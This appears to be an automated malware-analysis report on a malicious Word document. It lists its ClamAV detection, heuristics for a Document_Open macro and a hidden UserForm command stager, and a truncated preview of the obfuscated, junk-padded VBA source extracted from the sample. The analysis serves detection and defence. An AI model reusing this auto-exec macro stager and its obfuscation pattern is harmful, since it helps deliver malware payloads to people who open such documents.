Verdict: MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro and a UserForm hidden-property command stager, which are indicative of malicious intent. The presence of these elements suggests the file is designed to execute arbitrary code, likely downloading a secondary payload. The ClamAV detection further supports its malicious classification.
Heuristics (8)
- ClamAV: Doc.Malware.Sagent-7465573-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Sagent-7465573-0
- VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA UserForm hidden-property command stager [critical] OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER: VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13722 bytes |

SHA-256: a16196ec1104ab16dc48d7652e1d8c5db4a705aec2d86b153cf27038dfbacae2

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Pvndiiiiicafg"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Yeihgdlu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Cgwqqrxw = "Laboriosam non modi voluptas."
Dim Qsewuxwbvt As Boolean
Dim Nhvceddntmmp As Boolean
Vwexytxnkpb = ("Omnis soluta earum consequatur enim neque mollitia quod.")
Dim Ncirlbksounnt As String
Dim Segowfczwxvg As Double
Dim Wgbfgpllvanpw As Boolean
Qjeaevgi = Rlcltqvq
Dim Omindihifbgj As Double
Gorgpeqxpcoei = ("Est provident dolor laudantium.")
Dim Kszconda As Double
Dim Vnxdlvipeffyo As Double
Dim Brxfzzzigui As Double
Hkcnajurt = "Qui nobis autem optio."
Dim Hgpdtwle As String
Dim Nwgvrwwerid As Boolean
Dim Hudsyegx As Double
Tytkwpjieisuo = ("Quis.")
Dim Imxmblatehjq As Boolean
Zsqeznwymzp = 804
Zfimfhaprikgk = Ocnyfvepb
Ivkaywumbnw = 144
Svqoifzvpsjq
Eayiupkt = "Et similique veritatis laborum fuga alias minima quas."
Dim Wgbghfdekj As String
Dim Piepdknesx As Double
Npbjrztgorhva = ("Eveniet eum.")
Dim Fhafczulqde As Double
Dim Gyryietsdtmkq As Integer
Dim Xajpfvixrrvy As Integer
Lgnntaqa = Vfwbnnulda
Dim Togexbzhnga As Double
Nzxwvdwsxuay = ("Consequatur blanditiis doloribus quia.")
Dim Exjuspwmyh As Boolean
Dim Pbbzpeij As Boolean
Dim Xohwrwwuffq As Double
Jdlhywabpgsn = "Ann"
Dim Yevqxkqavmvy As Integer
Dim Dbkmyfrvdwj As String
Dim Mhhpivfyqkptg As Integer
Iymawlxowg = ("Dolorem corporis omnis repudiandae.")
Dim Zcayhkldsnx As Integer
Uqnrvsra = 87
Fkiqnpsljte = Plhivbqubawcu
Bnxprovoyuxoa = 520
End Sub
Attribute VB_Name = "Llzjsomymu"
Attribute VB_Base = "0{B063551D-358A-4682-802E-27D87D913A49}{47510570-C273-4B35-BFC5-0F24BD599AF9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Qnrnsagenrr"
Function Puenvxqhppza()
Krvppctxch = "Tenetur repellat."
Dim Byifymhvcv As Boolean
Dim Hvgharfdiomkn As Double
Xvjjxrhzuk = ("Consequuntur.")
Dim Texhpuyhuwl As String
Dim Cmznmyszcj As Integer
Dim Mzfzwlxhbmzl As Double
Ppqqbjmyvfhli = Qquxodvs
Dim Kopjpmogoicil As String
Gndarkckhkv = ("Cumque dolorem provident.")
Dim Ruuwitrvwpg As Integer
Dim Fudxifmhiqrs As Integer
Dim Hdiyuiboto As Boolean
Sqvjxxhyfihjc = "Ut explicabo quo a quibusdam aut ut repudiandae."
Dim Gjecdrgjrorl As Integer
Dim Qaprimvmysul As String
Dim Zwzwdqvfp As Double
Hlgdvglx = ("Est reiciendis tempora accusamus dolor nostrum ut omnis commodi debitis.")
Dim Hrrtdvtllhs As Boolean
Kuouitwllcpaa = 94
Cmjnlrreh = Ubtdfkim
Gldejewpct = 265
Hibzcahxggniu = Pvndiiiiicafg.Yeihgdlu
Zdzfojhjet = "Temporibus saepe unde omnis."
Dim Muihmbxcd As String
Dim Pqiryutcv As Double
Lcgxbqrblmzzx = ("Delectus est sequi quidem.")
Dim Tswjfgbxj As Integer
Dim Siokqbfnj As String
Dim Ozhkcnuq As String
Hsbbgmxrje = Uximavytjz
Dim Dwbuenctxwkq As String
Kpivzbdfek = ("Doloremque voluptas ut fuga.")
Dim Mzrxaisjxjk As String
Dim Wcdlymsyrkj As Double
Dim Zzoysrtobdb As Double
Cxemafgidyzu = "Aut quas animi aperiam cupiditate blanditiis facilis et quod in."
Dim Iruoimnituyrs As Integer
Dim Uzckdkuufjeef As String
Dim Oemukxgo As Boolean
Iueknjmxjjz = ("Ted")
Dim Cnoxpeeihl As Integer
Ufxybnkjw = 930
Pkrargvnaru = Wzrjofail
Eoyivonmhxyn = 174
Sdrtiwrtipp = Hibzcahxggniu + Llzjsomymu.Njxcnafirzawl + Llzjsomymu.Kodscscwipa + Llzjsomymu.Wobtmsvxjz
Pteetwqlpd = "Fugit."
Dim Arssquqyj As Integer
Dim Ksuvhhrmgzgc As Boolean
Lkadbqtv = ("Cumque.")
Dim Vltqyimc As String
Dim Ulyaidxr As Integer
Dim Uofsfkqvi As Boolean
Okqavnbo = Dtlfzmzuxt
Dim Bjgfblosqus As Integer
Bianpwcju = ("Praesentium voluptates at amet voluptatem.")
Dim Umfxqakxyaig As Integer
Dim Mpzfwjalzxd As Double
Dim Hwzegsllp As String
Bqjvcfsb
... (truncated)